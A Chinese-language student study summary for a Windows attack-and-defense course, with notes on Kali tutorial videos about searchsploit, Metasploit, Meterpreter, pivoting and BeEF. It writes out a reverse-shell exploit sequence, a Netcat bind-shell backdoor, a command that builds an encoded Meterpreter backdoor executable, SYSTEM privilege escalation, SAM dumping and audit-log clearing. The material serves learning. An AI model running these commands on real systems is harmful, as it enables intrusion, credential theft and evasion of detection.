20159313網絡攻擊與防範第七周學習總結

第七章Windows作業系統安全攻防總結#

1.Windows作業系統的基本結構##

分為運作于處理器特權模式的作業系統核心，以及運作在處理器非特權模式的使用者空間代碼。采用宏核心模式來進行構架，這使得任意的核心子產品或裝置驅動程式都可能破壞其他核心子產品資料，這種宏核心機制也使得Windows作業系統容易遭受以驅動方式植入核心的Rootkit的危害，為了避免這類攻擊，最新的Windows7預設要求是以請求安裝進入核心執行的裝置驅動程式都需要經過數字簽名，這能夠有效地提升核心的安全性。同時，由于使用者态程式對作業系統核心特權代碼和資料沒有直接通路的權利，是以Windows核心子產品對惡意的使用者态程式具備完善的防禦能力。

2.Windows作業系統核心的基本子產品包括如下##

Windows執行體、Windows核心體、裝置驅動程式、硬體抽象層、Windows視窗與圖形界面接口核心實作代碼。

3.Windows作業系統在使用者态的代碼子產品則包括如下##

系統支援程序、環境子系統服務程序、服務程序、使用者應用軟體、核心子系統DLL。

4.Windows作業系統核心中實作了如下的核心機制##

Windows程序和線程管理機制、Windows記憶體管理機制（Windows的虛拟記憶體空間分為系統核心記憶體區與使用者記憶體區間兩部分，系統核心記憶體用于映射核心、HAL、Win32k.sys等核心執行子產品，并存儲核心記憶體對象，對于核心中運作的特權代碼，則可通過DKOM技術來進行枚舉和操縱）、Windows檔案管理機制（NTFS）、Windows系統資料庫管理機制（系統資料庫中的系統自啟動挂接點上注冊的應用軟體可以随系統引導而自動運作，是以也是很多惡意代碼及流氓軟體普遍的攻擊目标）、Windows的網絡機制（從OSI網絡參考模型的實體層到應用層，各層上對應的Windows網絡元件子產品包括如下：①各層網卡硬體的裝置驅動程式，處于OSI參考模型的實體層②NDIS庫及miniport驅動程式，位于OSI鍊路層③TDI，對應OSI網絡層與傳輸層④網絡APIDLL及TDI用戶端，對應OSI會話層與表示層⑤網絡應用程式與服務程序，對應OSI應用層）。

5.Windows安全體系結構##

Windows作業系統基于引用監控器模型來實作基本的對象安全模型。系統中所有主體對客體的通路都通過引用監控器作為中介，由引用監控器根據安全通路控制政策來進行授權通路，所有通路記錄也都由引用監控器生成審計日志。Windows作業系統實作基礎的安全機制，其中最核心的是位于核心的SRM安全引用監控器，以及位于使用者态的LSASS安全服務，它們與Winlogon/Netlogon及Eventlog等服務一起，實作了對主體使用者的身份認證機制，對所有資源對象的通路控制機制，以及對通路的安全審計機制。

Windows身份認證機制：Windows作業系統中以安全主體概念來包含所有進行系統資源通路請求的實體對象，有使用者、使用者組和計算機三大類，對于每個安全主體，以時間和空間上都全局唯一的SID安全辨別符來進行辨別。賬戶權限的根本作用就是限制這些賬戶内運作程式對系統資源對象的通路。Windows系統中擁有一些内建賬戶，如擁有最高權限的本地Administrator賬戶，作為自動運作系統程序環境的SYSTEM/LocalSystem賬戶，具有相對極少權限的Guest匿名通路使用者，以及IUSR_Machinename IIS服務的匿名網絡通路賬戶等。而這些賬戶在黑客眼中，本地Administrator和SYSTEM賬戶擁有最高的權限，是他們攻擊的終極目标。Windows系統的内建使用者組包括：本地最高權限使用者組Administrators、具有單一方面系統權限的Account/Backup/Server/Print Operators等操作組、用于容納服務賬戶的Network Service與Local Service使用者組，以及所有使用者賬戶所在的Users組等。 Windows使用者賬戶的密碼字經過加密處理之後被儲存于SAM或者活動目錄AD中，其中本地使用者賬戶密碼資訊經過不可逆的128位随機密鑰Hash加密後存儲在SAM檔案中，SAM存儲于%systemroot%\system32\config\sam檔案系統路徑位置，并在系統資料庫的HKEY_LOCAL MACHINE\SAM存有副本。Windows域賬戶密碼資訊則儲存在域控制器的活動目錄AD中，加密方式與單機平台一緻，存儲檔案系統位置是域控制器的%systemroot%\ntds\ntds.dit路徑。Windows支援本地身份認證和網絡身份認證兩種方式，分别對在本地系統登入和遠端網絡通路的主主體進行合法性驗證。網絡身份認證過程由LSASS服務的Netlogon子產品主導完成。

6.Windows授權與通路控制機制##

Windows的授權與通路控制機制是基于引用監控器模型，由核心中的SRM子產品與使用者态的LSASS服務共同來實施。在Windows伺服器作業系統中，使用者可以執行内建的whoami指令來檢視目前使用者的通路令牌資訊。Windows對于系統中所有需保護的資源都抽象成對象，具體類型包括檔案、目錄、系統資料庫鍵值、核心對象、同步對象、私有對象、管道、記憶體、通信接口等，而對每個對象會關聯一個SD安全描述符，對象安全描述符由如下主要屬性組成：Owner SID、Group SID、DACL自主通路控制清單、SACL系統審計通路控制清單。

7.Windows安全審計機制##

系統審計政策在本地安全政策中由系統管理者定義，來确定系統對那些事件進行記錄。

8.Windows的其他安全機制##

身份認證、授權與通路控制以及安全審計是三個基本安全功能。保護Windows系統安全穩定運作最為關鍵的三項安全措施——防火牆、更新檔自動更新以及病毒防護。除安全中心之外，Windows的安全特性還包括IPSec加密與驗證機制、EFS加密檔案系統、Windows檔案保護機制、捆綁的IE浏覽器所提供的隐私保護與浏覽安全保護機制等。

9.目前Windows遠端攻擊技術可以分為以下幾大類##

遠端密碼猜測與破解攻擊、攻擊Windows網絡服務、攻擊Windows用戶端及使用者。

10.Windows系統的安全漏洞生命周期##

系統安全的本質核心在于安全漏洞、滲透攻擊及安全檢測防禦機制之間的攻防博弈與競賽。所有在安全社群中被公開披露和确認的安全漏洞都将進入到業界知名的CVE、NVD、SecurityFocus、OSVDB等幾個通用漏洞資訊庫中。國内的安全漏洞資訊庫包括由中國資訊安全評測中心維護的中國“國家漏洞庫CNNVD”、由國際計算機網絡應急技術處理協調中心維護的“國家資訊安全漏洞共享平台CNVD”、安全廠商綠盟科技公司維護的綠盟漏洞資訊庫，以及Sebug網站維護的SSVDB等。針對一個特定的主機系統目标，典型的滲透攻擊過程包括漏洞掃描測試、查找針對發現漏洞的滲透代碼、實施滲透測試這幾個環節。在查找安全漏洞所對應的滲透攻擊代碼資源時，需要注意的是并非每個已知安全漏洞都能夠在網際網路上擷取到滲透測試者所期望的滲透代碼。首先，并非每個已知安全漏洞都存在可用的滲透代碼，安全漏洞所在的軟體的流行度、漏洞的利用限制條件以及漏洞的危害後果類型等都影響了為該安全漏洞開發滲透攻擊代碼的價值，另外有些安全漏洞在利用之前就已經被軟體廠商所修補，那麼也可能導緻沒人去開發相應的滲透代碼，另外一些安全漏洞的利用難度很大，也存在着特定時間裡沒人有技術能力寫出滲透代碼的情況，其次，并非所有的滲透代碼都是公開的，最後，擷取到的滲透代碼并非是對所有目标系統環境都适用的。可否達成測試者的預期目标則取決于滲透代碼和攻擊目标的軟體環境是否比對。

11.使用Metasploit軟體實施滲透測試##

Metasploit軟體采用開發架構和子產品組建的可擴充模型，以Ruby語言編寫的Metasploit Framework（MSF）庫作為整個軟體的基礎核心，為滲透測試組建的開發與測試提供平台；子產品組建是真正實施滲透攻擊的代碼，包括利用安全漏洞的Exploits子產品，進行掃描、查點等其他輔助任務的Auxiliary子產品，在目标系統上植入和運作的Shellcode攻擊負載Payloads子產品，對攻擊負載進行編碼以躲避檢測的Encoders子產品，以及對攻擊負載進行填充的Nops子產品；Metasploit提供多種使用者接口，包括Console互動終端、指令行程式運作、Web互動界面以及GUI圖形化界面；Metasploit還提供了API接口及插件支援，來支援第三方在MSF基礎上開發擴充子產品，比如自動化的滲透測試例程等等。

12.使Metasploit Console終端實施滲透測試，隻需運作如下指令##

①use exploit/windows/dcerpc/ms03_026_dcom,選擇針對MS03_026漏洞的滲透攻擊子產品。②set PAYLOAD generic/shell reverse_tcp，選擇該滲透攻擊子產品适用的攻擊負載子產品。③set LHOST 192.168.200.2；set RHOST 192.168.200.124,配置該滲透攻擊子產品和攻擊負載子產品所必須配置的參數。④exploit，實施滲透攻擊過程。⑤在遠端控制會話中與目标主機進行互動，可能需要執行“sessions -I”列出目前已建立的遠端控制會話，并執行“sessions –i數字”在指定的供給控制會話中與遠端目标主機進行互動。

13.遠端密碼字猜測##

Windows通過基于伺服器消息塊協定承載的檔案與列印共享服務來為網絡使用者提供通路檔案系統和列印機的支援，而SMB協定也成為了攻擊者實施Windows遠端密碼字猜測的傳統攻擊管道。其他經常遭受遠端密碼字猜測攻擊的Windows網絡服務還包括WMI服務、TS遠端桌面終端服務、MS SQL資料庫服務、SharePoint等使用Windows身份認證Web應用服務。SMB協定通常運作于TCP445端口與TCP139端口。在SMB服務決定授予網絡使用者對所請求的共享檔案或列印機的通路權之前，它會先對使用者身份進行驗證。攻擊者通常使用SMB預設開放的隐藏共享卷作為攻擊點，然後攻擊者需要目标系統的使用者名單作為猜測對象，然後根據提示輸入所猜測的Administrator賬戶的密碼，就可以發動攻擊了。當然遠端密碼字猜測成功的前提條件是大量系統中設定了具備弱密碼字的使用者帳号。目前能夠自動執行Windows遠端密碼字猜測的工具比較流行與常用的工具包括Legion、enum、SMBGrind、NTScan，以及國内較流行的XScan、小榕軟體之流光和NTScan漢化版等，這些遠端密碼猜測工具往往需要配合一個包含“高機率密碼”的字典檔案來實施攻擊，對長度較短的密碼也能夠進行窮舉暴力破解。對于運作于TCP1433和UDP1434端口的MS SQL Server，可以使用sqlbf、Auto-SQL等工具進行密碼猜測破解。

14.遠端密碼字交換通信竊聽與破解##

第二種實施遠端密碼字攻擊的經典技術是竊聽網絡上的密碼字交換通信實施破解。應對遠端密碼猜測與破解這種古老但仍然流行的攻擊方式，最根本的防禦措施仍然是通過安全教育訓練與教育來讓網絡中每個使用者都能夠設定較高安全強度的密碼。此外，從技術方面，網絡系統管理者還可以實施如下措施，進而降低由于網絡中使用者設定過于簡單的密碼所帶來的安全風險：①盡量關閉不必要開放的易受遠端密碼猜測攻擊網絡服務，包括TCP 139/445端口的SMB服務、TCP135端口的WMI服務、TCP3389端口的TS終端服務以及TCP1433端口的MS SQL Server服務等。②配置主機防火牆來限制對上述端口的服務。③利用網絡防火牆來限制到這些服務的通路。④應對遠端密碼字交換通信竊聽與破解攻擊最基本的途徑是禁用過時而且存在本質上安全缺陷的LanMan與NTLM。⑤對于安全級别較高的Windows系統伺服器等主機，管理者可以制定和實施強密碼字政策，此外可以設定賬戶鎖定門檻值，最後還可以在系統上激活帳戶登入失敗事件審計功能。

15.Windows網絡服務遠端滲透攻擊##

Windows作業系統預設開放135（TCP）、137（UDP）、138（UDP）、139（TCP）與445（TCP）端口，對應的網絡服務為MSRPC遠端調用服務、NetBIOS網絡基本輸入/輸出系統服務和SMB檔案與列印共享服務。

16.針對NetBIOS網絡服務的著名漏洞及攻擊##

NetBIOS網絡基本輸入輸出系統提供了Windows區域網路聯網的基本支援，包括在UDP137端口上監聽的NetBIOS名字服務、UDP138端口上的NetBIOS資料報服務以及TCP139端口上的NetBIOS會話服務。

17.針對SMB網絡服務的著名漏洞及攻擊##

服務消息塊SMB是Windows作業系統中最為複雜，也最容易遭受遠端滲透攻擊的網絡服務。SMB空會話是Windows網絡中影響範圍最廣和時間最長的安全弱點之一。

18.針對MSRPC網絡服務的著名漏洞及攻擊##

MSRPC網絡服務是微軟Windows作業系統對DCE-RPC标準遠端過程調用機制的實作。遠端過程調用機制是現代作業系統最基本的支撐機制之一，允許一個應用程式能夠無縫地通過網絡調用遠端主機上網絡程序中的過程，在MSRPC實作中，可以采用如下的網絡傳輸協定：①ncacn_ip_tcp：TCP/IP傳輸協定，使用TCP135端口②ncadg_ip_udp:UDP/IP傳輸協定，使用UDP135端口③ncacn_np:SMB命名管道傳輸協定，使用SMB的TCP139或445端口④ncalrpc:本地網絡RPC傳輸⑤ncacn_http:HTTP傳輸協定，基于IIS服務，預設配置在TCP593端口。支援遠端過程調用的服務程序啟動時，需要注冊自己的服務通路點，接口辨別符以及服務版本号，一個特殊的RPC服務——Portmapper将維護RPC服務資料庫，為網絡應用程式調用指定的RPC服務提供通路點、接口與版本的查詢功能支援。

19.針對Windows系統上微軟網絡服務的遠端滲透攻擊##

IIS Internet服務內建了HTTP、FTP、SMTP、POP、NNTP等網絡服務，并支援CGI、ASP、ISAPI等動态程式設計語言與接口，是微軟伺服器軟體提供網站、電子郵件收發和檔案共享服務的主要解決方案。MS SQL Server監聽TCP1433與UDP1434端口，支援使用Windows使用者賬号進行身份認證模式。MS SQL Server自建使用者身份認證模式，SQL Server資料庫服務的登陸賬号加密存儲與master資料庫的syslogins表中，并對使用者進行角色管理和授權通路控制，同時提供通路日志功能，整體安全水準能夠達到C2級别。

20.網絡服務遠端滲透攻擊防範措施##

針對Windows系統上的各種網絡服務遠端滲透攻擊，最基本的防範措施就是盡量避免與消除這些滲透攻擊所依賴的服務軟體安全漏洞，具體包括如下：①從軟體設計開發根源上盡可能減少安全漏洞的出現②作為系統的使用者和管理者，應盡可能快地更新與應用軟體安全更新檔③在安全漏洞從被意外公布和利用到更新檔釋出的這段“零日”漏洞時間，管理者對安全敏感的伺服器應該測試和實施科永的攻擊緩解配置④利用服務軟體廠商及社群中提供的安全核對清單來對服務進行安全配置⑤通過漏洞掃描軟體來辨別網絡中存在的以及安全漏洞并及時修補。

21.Windows本地特權提升##

從受限使用者權限嘗試獲得特權賬戶的攻擊技術也被稱為特權提升，業内簡稱為“提權”。Windows系統上進行特權提升的共計途徑主要是通過DLL注入和破解本地程式安全漏洞。從技術上來說，獲得了Administrator權限并不意味着獲得了Windows系統的最高權限，Local System賬戶比Administrator賬戶的權限更高，比如Administrator不能在系統運作時刻讀取SAM位置系統資料庫鍵值，而Local System卻可以。有了Administrator權限，獲得Local System權限就很簡單了，一種方法是利用Windows的計劃任務服務，執行“atXX:XX/INTERACTIVE cmd.exe”打開一個指令Shell，該Shell的權限即為Local System；另一種方法是利用sysinternals的免費工具psexec，它甚至允許以遠端方式獲得和使用Local System權限。針對本地提權攻擊，與網絡服務的遠端滲透攻擊類似，最根本的防範措施就是及時給你的系統打好各種更新檔。

22.Windows系統密碼字密文提取技術##

在本地擷取密碼字密文的主要包括如下三種途徑：①從另一種作業系統啟動後拷貝檔案系統中的密碼密文檔案②利用硬碟修複工具包中的rdisk工具，執行“rdisk/s-”指令建立SAM備份檔案副本③使用pwdumpX系列工具直接從SAM檔案或活動目錄中提取密碼字密文。

23.LSA Aercrets通常位于HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets子鍵下，LSA Secrets收錄如下資訊##

①某些服務賬戶的明文密碼字②本季系統最近10位使用者的密碼字密文③FTP、Web使用者的明文密碼字④RAS遠端通路服務撥号賬戶的名字和密碼字⑤用來通路域控制器的計算機賬戶和密碼字密文。

24.使用者敏感資料竊取##

對于使用者在系統中的檔案，攻擊者可以執行find、findstr、grep等指令行工具來實施查找，此外，攻擊者也可能使用鍵擊記錄器來對使用者鍵盤輸入進行監聽，并期望從中搜尋使用者登陸某些應用軟體、網遊、金融網站的密碼密碼。

25.本地敏感資訊竊取防範措施##

針對LSA Secrets和其他位置密碼字的竊取與破解，目前這種攻擊普遍需要攻擊者已經具有Administrator的權限，在這種情況下，系統很難防止攻擊者擷取到這些資訊，是以隻能通過使用更安全的加密算法保護明文密碼字，以及通過安全配置政策避免緩存關鍵伺服器的銘感登陸密碼資訊，來盡量降低這種攻擊造成的安全風險。

26.Windows消蹤滅迹##

①關閉審計功能（Windows Resource Kit工具包裡的auditpol程式可以讓他們輕易地關閉審計功能）②清理事件日志（使用Event Viewer事件檢視器來打開、讀取和清除這台主機上的事件日志）

27.Windows遠端控制與後門程式##

攻擊者往往會在受控的系統中自主植入第三方的遠端控制與後門程式，主要分為指令行遠端控制工具、圖形化遠端控制工具這兩大類。Netcat工具是攻擊者們最常用的指令行遠端控制工具麼可以通過“nc-L-d-e cmd.exe-p 80”指令啟動後門服務，監聽所配置的TCP 80端口，并綁定cmd.exe這個Shell程式，當攻擊者使用Netcat作為用戶端連接配接目标主機的80端口時，就可以通過網絡直接通路到目标主機上的cmd.exe來執行任意的操作。Meterpreter的設計目标包括如下：①隐蔽性②設計功能強大③靈活可擴充。

28.針對後門程式的防範措施##

針對遠端控制後門程式，在一台計算機已經懷疑遭受攻擊的Windows系統上，防禦者可以采用一些後門檢測軟體來嘗試發現攻擊者隐藏的後門程式，常用的檢測軟體包括反病毒廠商所提供的防毒軟體，以及一些專業的後門及Rootkit檢測軟體。

Kali視訊第26-30集總結#

1.Kali視訊第26集漏洞利用之檢索與利用總結##

Searchsploit

1、工具簡介

這個項目是由Offensive Security發起的、基于exploit database官方漏洞資料庫源的漏洞搜尋工具，可以直接在終端搜尋漏洞相關資訊，如漏洞簡介和漏洞驗證/利用腳本。

2、使用方法

在kali終端直接輸入“searchsploit -h”可以檢視其相關參數用法：

light@kali:~# searchsploit -h

Usage : searchsploit [OPTIONS] term1 [term2] ... [termN]

Example: searchsploit oracle windows local

OPTIONS

-c - Perform case-sensitive searches; by default,

searches will try to be greedy

-v - By setting verbose output, description lines

are allowed to overflow their columns

-h, --help - Show help screen

NOTES:

• Use any number of search terms you would like (minimum: 1)

• Search terms are not case sensitive, and order is irrelevant

  參數解釋：

  •-c : 搜尋是大小寫敏感

  •-v : 詳細輸出

  

  3、使用示範

  比如我們要搜尋windows上iis服務的遠端漏洞，可以使用以下指令：

  light@kali:~# searchsploit windows iis remote

  Description Path

  MS Windows IIS 5.0 - 5.1 - Remote Denial of | /windows/dos/35.c

  MS Windows Media Services (nsiislog.dll) Rem | /windows/remote/56.c

  MS Windows IIS SSL Remote Denial of Service | /windows/dos/176.c

  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/189.c

  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/190.c

  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/191.pl

  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/192.pl

  MS Windows IIS 5.0 SSL Remote buffer overflo | /windows/remote/275.c

  MS Windows IIS 5.0 (500-100.asp) Server Name | /windows/remote/1178.c

  MS Windows IIS SA WebAgent 5.2/5.3 Redirect | /windows/remote/1260.pm

  Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial | /windows/dos/3965.pl

  Microsoft IIS <= 5.1 Hit Highlighting Authen | /windows/remote/4016.sh

  Oracle WebLogic IIS connector JSESSIONID Rem | /windows/remote/8336.pl

  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8704.txt

  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8754.patch

  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8765.php

  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8806.pl

  Microsoft IIS 5.0/6.0 FTP Server Remote Stac | /windows/remote/9541.pl

  Microsoft IIS 5.0 FTP Server Remote Stack Ov | /windows/remote/9559.pl

  Microsoft IIS ASP Multiple Extensions Securi | /windows/remote/10791.py

  Microsoft Internet Information Services (IIS | /windows/remote/14179.txt

  Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS | /windows/dos/15803.py

  Microsoft IIS ISAPI w3who.dll Query String O | /windows/remote/16354.rb

  Microsoft IIS ISAPI nsiislog.dll ISAPI POST | /windows/remote/16355.rb

2.Kali視訊第27集漏洞利用之Metasploit基礎總結##

Metasploitable在滲透測試中經常被用到，實際上這套軟體包括了很多工具，這些工具組成了一個完整的攻擊架構。

一、啟動服務

在Kali中使用metaaploie，需要先開啟PostgreSQL資料庫服務和metasploit服務，然後就可以完整的利用msf資料查詢exploit和記錄。

service postgresql start service metasploit start

如果不想每次開機都手工啟動服務，可以配置随系統啟動。

update-rc.d postgresql enable

update-rc.d metasploit enable

二、路徑介紹

Kali中msf的路徑為/usr/metasploit-framework

Auxiliary：輔助子產品，

encoders：供msfencode編碼工具使用，具體可以使用

msfencode –l

exploits：攻擊子產品 每個介紹msf的文章都會提到那個ms08_067_netapi，它就在這個目錄下。

payloads：其中列出的是攻擊載荷，也就是攻擊成功後執行的代碼。比如我們常設定的windows/meterpreter/reverse_tcp就在這個檔案夾下。

post：後滲透階段塊，在獲得meterpreter的shell之後可以使用攻擊代碼。比如常用的hashdump、arp_scanner就在這裡。

三、基本指令

msfpayload：用來生成payload或者shellcode

搜尋的時候可以用msfpayload -l |grep "windows"這樣的指令查詢。-o 選項可以列出payload所需的參數。

msfencode：

msf中的編碼器，早期為了編碼繞過AV，現常用msfpayload與它編碼避免exploit中的壞字元串。

msfconsole：開啟metasploit的concle

四、測試示例：發現漏洞，搜尋exploit

前期掃描得知，目标21端口vsftpd服務版本為2.3.4，使用msfconsole打開msf的指令行版。

找到比對項

選擇相應功能

設定遠端ip位址，端口号用21

攻擊成功

3.Kali視訊第28集漏洞利用之Meterpreter介紹總結##

Meterpreter是Metasploit架構中的一個擴充子產品，作為溢出成功後的攻擊載荷使用，攻擊載荷在溢出攻擊成功以後給我們傳回一個控制通道。使用它作為攻擊載荷能夠獲得目标系統的一個meterpretershell的連結。

Meterpreter作為後滲透子產品有多種類型，并且指令由核心指令和擴充庫組成，極大地豐富了攻擊方式。其有很多有用的功能。

常用指令：

background：将目前會話放置背景

load/use：加載子產品

Interact：切換一個信道

migrate：遷移程序

run：執行一個已有子產品，輸入run後按兩下teb，會列出所有的已有腳本。

Resource：執行一個已有的rc腳本常用的Meterpreter類型為：payload/windows/meterpreter/reverse_tcp

針對windows作業系統，反向連接配接shell，隻用起來比較穩定。

一、生成Meterpreter後門

指令：msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.75.132 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

在指定目錄，生成exe檔案

生成一個後門就要打開一個監聽，接收傳回的連接配接，檢視需要的參數。需要兩個參數LHOST，LPORT。

将生成的檔案模仿入侵的過程移動到靶機裡。

set LPORT 2333

set LHOST 192.168.75.132

exploit

background傳回到msf裡

screenshot桌面截圖

4.kali視訊第29集Metasploit後滲透測試總結##

怎樣設定跳闆機？

在跳闆機擷取一定權限後，需要積極地向内網主機權限發展，擷取指定的目标資訊，探查系統的漏洞，借助Msf已經得到的Meterpreter後門，可以使後續操作更容易。

1、檢視目前網卡、網段資訊

先控制一台跳闆機，檢視相關網卡網段資訊

2、添加路由表 run autoroute -s 10.0.0.1

3、開Socks代理 通過使用 auxiliaryver/socks4a子產品，建立一個Socks代理，可以作為浏覽器，Sqlmp，Namp等使用。

4、通過Background和sessions -i可以自由切換進入Session

5、輸入run可以看到Meterpreter上可以做的很多指令

6、擷取内網資訊run arp_scanner -r 10.0.0.1/24

7、也可上傳檔案，做端口轉發後續測試

8、應用程式/權限維持/Tunnel工具集

9、端口轉發 upload lcx.exe c:\

5.Kali視訊第30集漏洞利用之BeeF總結##

對XSS漏洞需要強大架構的支援，如網上的XSS平台。在Kali下，BeeF是一個不遜色于XSS平台的工具。Beef是浏覽器攻擊架構的簡稱，是一款專注于浏覽器端的滲透測試工具。官網 http://beefproject.com/

1、指令行下啟動Beef beef-xss 此時浏覽器自動通路此頁面：http://127.0.0.1:3000/ui/authentication 使用預設使用者名beef與預設密碼beef登入：

初始使用者名和密碼為：beef和beef 左側為目标的浏覽器

2、假設被測試主機由于XSS漏洞請求到 http://192.168.11.152:3000/demos/basic.html

左側online browsers出現新的選項，其Current Browser中包括浏覽器名稱、版本、作業系統版本等。

3、HOOK持續的時間為關閉測試頁面為止，在此期間，相當于被控制了，可以發送攻擊指令，在Commands子產品，我們可以完成很多任務：

其中，四種顔色分别表示：

該攻擊子產品可用，但隐蔽性強

該攻擊子產品可用，但隐蔽性差

該使用者子產品是否可用還有待驗證

該攻擊子產品不可用

選取MISC下Raw JavaScript子產品作為測試用例

執行，檢視傳回結果，成功則顯示

4、代理Proxy功能

選中目标主機，點右鍵，在菜單中選中Use as Proxy；然後在Rider頁籤中的Forge Request編輯并發送想要發送的内容。

第七周學習進度#

完成了課本第七章的學習，完成了kali視訊第26到30集的學習。